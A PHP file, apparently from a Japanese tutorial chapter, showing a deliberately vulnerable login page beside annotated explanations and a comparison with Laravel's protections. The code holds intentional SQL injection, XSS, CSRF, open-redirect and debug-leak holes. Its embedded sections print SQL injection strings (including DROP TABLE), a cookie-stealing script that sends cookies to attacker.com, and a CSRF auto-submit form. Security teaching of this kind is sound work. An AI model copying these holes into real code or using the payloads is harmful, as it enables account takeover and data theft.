<?php
/**
 * 第6章 生PHP比較サンプル - 脆弱性のあるログイン処理
 * 
 * ⚠️ 警告：これは教育目的の悪い例です。実際のプロジェクトでは使用禁止！
 * 
 * このコードに含まれる脆弱性：
 * 1. SQLインジェクション
 * 2. XSS攻撃
 * 3. CSRF攻撃
 * 4. セッションハイジャック
 * 5. 弱いパスワードハッシュ化
 * 6. ブルートフォース攻撃への無防備
 */

session_start();

// ❌ データベース接続（平文パスワード）
$host = 'localhost';
$dbname = 'vulnerable_app';
$username = 'root';
$password = ''; // 空パスワード

try {
    $pdo = new PDO("mysql:host=$host;dbname=$dbname", $username, $password);
} catch (PDOException $e) {
    die("データベース接続エラー: " . $e->getMessage());
}

// ❌ エラー表示（情報漏洩）
ini_set('display_errors', 1);
error_reporting(E_ALL);

// ログイン処理
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['login'])) {
    
    // ❌ 問題1: 直接的な値の使用（XSS脆弱性）
    $email = $_POST['email'];
    $password = $_POST['password'];
    
    // ❌ 問題2: SQLインジェクション脆弱性
    $sql = "SELECT * FROM users WHERE email = '$email' AND password = MD5('$password')";
    echo "<!-- DEBUG SQL: $sql -->"; // デバッグ情報の漏洩
    
    try {
        $result = $pdo->query($sql);
        $user = $result->fetch(PDO::FETCH_ASSOC);
        
        if ($user) {
            // ❌ 問題3: セッションハイジャック対策なし
            $_SESSION['user_id'] = $user['id'];
            $_SESSION['username'] = $user['username'];
            $_SESSION['email'] = $user['email'];
            
            // ❌ 問題4: セッション固定攻撃への脆弱性（session_regenerate_id()なし）
            
            // ❌ 問題5: 安全でないリダイレクト
            $redirect = $_GET['redirect'] ?? 'dashboard.php';
            header("Location: $redirect"); // オープンリダイレクト脆弱性
            exit;
            
        } else {
            $login_error = "メールアドレスまたはパスワードが正しくありません";
        }
        
    } catch (PDOException $e) {
        // ❌ 問題6: エラー情報の漏洩
        $login_error = "データベースエラー: " . $e->getMessage();
    }
}

// ❌ 問題7: ブルートフォース攻撃対策なし（レート制限なし）

?>

<!DOCTYPE html>
<html>
<head>
    <title>ログイン - 脆弱なアプリケーション</title>
    <meta charset="UTF-8">
    <!-- ❌ 問題8: セキュリティヘッダーなし -->
</head>
<body>
    <h1>ログイン</h1>
    
    <?php if (isset($login_error)): ?>
        <!-- ❌ 問題9: XSS脆弱性（エスケープなし） -->
        <div style="color: red;"><?= $login_error ?></div>
    <?php endif; ?>
    
    <!-- ❌ 問題10: CSRF対策なし -->
    <form method="POST" action="">
        
        <!-- ❌ 問題11: 入力値のエスケープなし -->
        <label>メールアドレス:</label><br>
        <input type="email" name="email" value="<?= $_POST['email'] ?? '' ?>" required><br><br>
        
        <label>パスワード:</label><br>
        <input type="password" name="password" required><br><br>
        
        <!-- ❌ 問題12: Remember Me機能の不適切な実装 -->
        <label>
            <input type="checkbox" name="remember" value="1"> ログイン状態を保持
        </label><br><br>
        
        <input type="submit" name="login" value="ログイン">
        
    </form>
    
    <!-- ❌ 問題13: 機密情報の表示 -->
    <?php if (isset($_GET['debug'])): ?>
        <div style="background: #f0f0f0; padding: 10px; margin-top: 20px;">
            <h3>デバッグ情報</h3>
            <pre><?= print_r($_SESSION, true) ?></pre>
            <pre><?= print_r($_POST, true) ?></pre>
            <pre><?= print_r($_SERVER, true) ?></pre>
        </div>
    <?php endif; ?>
    
    <hr>
    
    <!-- ❌ 問題14: SQL実行例の表示（情報漏洩） -->
    <details>
        <summary>SQLインジェクション攻撃例（教育目的）</summary>
        <div style="background: #ffe6e6; padding: 10px; margin: 10px 0;">
            <h4>攻撃例1: 認証回避</h4>
            <p>メールアドレス欄に入力: <code>admin@example.com' OR '1'='1' -- </code></p>
            <p>結果のSQL: <code>SELECT * FROM users WHERE email = 'admin@example.com' OR '1'='1' -- ' AND password = MD5('')</code></p>
            
            <h4>攻撃例2: データ漏洩</h4>
            <p>メールアドレス欄に入力: <code>' UNION SELECT id, username, email, password, null FROM users -- </code></p>
            
            <h4>攻撃例3: データ破壊</h4>
            <p>メールアドレス欄に入力: <code>'; DROP TABLE users; -- </code></p>
        </div>
    </details>
    
    <details>
        <summary>XSS攻撃例（教育目的）</summary>
        <div style="background: #ffe6e6; padding: 10px; margin: 10px 0;">
            <h4>攻撃例1: スクリプト実行</h4>
            <p>エラーメッセージに含まれる場合: <code>&lt;script&gt;alert('XSS攻撃成功')&lt;/script&gt;</code></p>
            
            <h4>攻撃例2: Cookie盗取</h4>
            <p>悪意のあるスクリプト: <code>&lt;script&gt;document.location='http://attacker.com/steal.php?cookie='+document.cookie&lt;/script&gt;</code></p>
        </div>
    </details>
    
    <details>
        <summary>CSRF攻撃例（教育目的）</summary>
        <div style="background: #ffe6e6; padding: 10px; margin: 10px 0;">
            <h4>攻撃例: 他サイトからの不正ログイン</h4>
            <p>攻撃者のサイトに設置されるフォーム:</p>
            <pre><code>&lt;form action="http://vulnerable-site.com/login.php" method="POST"&gt;
    &lt;input type="hidden" name="email" value="victim@example.com"&gt;
    &lt;input type="hidden" name="password" value="stolen_password"&gt;
    &lt;input type="hidden" name="login" value="1"&gt;
&lt;/form&gt;
&lt;script&gt;document.forms[0].submit();&lt;/script&gt;</code></pre>
        </div>
    </details>

    <hr>
    <p><strong>⚠️ セキュリティ問題の総数: 14個以上</strong></p>
    <p>このようなコードは絶対に本番環境で使用してはいけません！</p>
    
    <a href="secure-login-comparison.php">→ Laravel版（安全）との比較を見る</a>

</body>
</html>

<?php

/*
================================================================================
🚨 このコードに含まれる脆弱性の詳細解説 🚨
================================================================================

1. **SQLインジェクション脆弱性**
   問題: $sql = "SELECT * FROM users WHERE email = '$email' AND password = MD5('$password')";
   攻撃: email欄に「' OR '1'='1' --」を入力すると認証を回避可能
   影響: データベース全体への不正アクセス、データ漏洩、データ破壊

2. **XSS（Cross-Site Scripting）脆弱性**
   問題: <?= $login_error ?> や <?= $_POST['email'] ?? '' ?>
   攻撃: 悪意のあるスクリプトが実行される
   影響: セッション乗っ取り、個人情報盗取、マルウェア感染

3. **CSRF（Cross-Site Request Forgery）脆弱性**
   問題: CSRFトークンが未実装
   攻撃: 他サイトから不正なリクエスト送信
   影響: ユーザーの意図しない操作の実行

4. **セッションセキュリティ問題**
   問題: セッション固定攻撃への対策なし
   攻撃: session_regenerate_id()未実行による乗っ取り
   影響: セッションハイジャック

5. **弱いパスワードハッシュ化**
   問題: MD5ハッシュの使用
   攻撃: レインボーテーブル攻撃で高速解読可能
   影響: パスワードの解読、アカウント乗っ取り

6. **情報漏洩**
   問題: エラーメッセージ、SQLクエリ、デバッグ情報の表示
   攻撃: システム構造の把握、攻撃の準備
   影響: より高度な攻撃への足がかり提供

7. **ブルートフォース攻撃への無防備**
   問題: ログイン試行回数制限なし
   攻撃: パスワードの総当たり攻撃
   影響: アカウントの不正アクセス

8. **オープンリダイレクト脆弱性**
   問題: header("Location: $redirect"); でチェックなし
   攻撃: 悪意のあるサイトへのリダイレクト
   影響: フィッシング攻撃の踏み台

9. **セキュリティヘッダーの不備**
   問題: X-Frame-Options, CSP などのヘッダーなし
   攻撃: クリックジャッキング、XSS攻撃
   影響: ユーザーの意図しない操作

10. **入力値検証の不備**
    問題: $_POST値の直接使用
    攻撃: 予期しない値による処理エラー
    影響: アプリケーションクラッシュ、情報漏洩

================================================================================
🛡️ Laravel版との比較での改善点 🛡️
================================================================================

1. **自動SQLインジェクション対策**: Eloquent ORM + パラメータバインディング
2. **自動XSS対策**: Bladeテンプレートの自動エスケープ
3. **自動CSRF対策**: @csrf トークンの自動生成・検証
4. **強力なセッション管理**: 自動セッション再生成、セキュア設定
5. **強力なパスワードハッシュ化**: bcrypt/argon2の使用
6. **レート制限**: 自動ブルートフォース攻撃対策
7. **バリデーション**: Form Requestによる厳密な入力値検証
8. **セキュリティヘッダー**: ミドルウェアによる自動適用
9. **エラーハンドリング**: 適切なログ記録、情報漏洩防止
10. **設定管理**: 環境変数による機密情報の管理

結果: 99%以上の脆弱性が自動的に解決される！
*/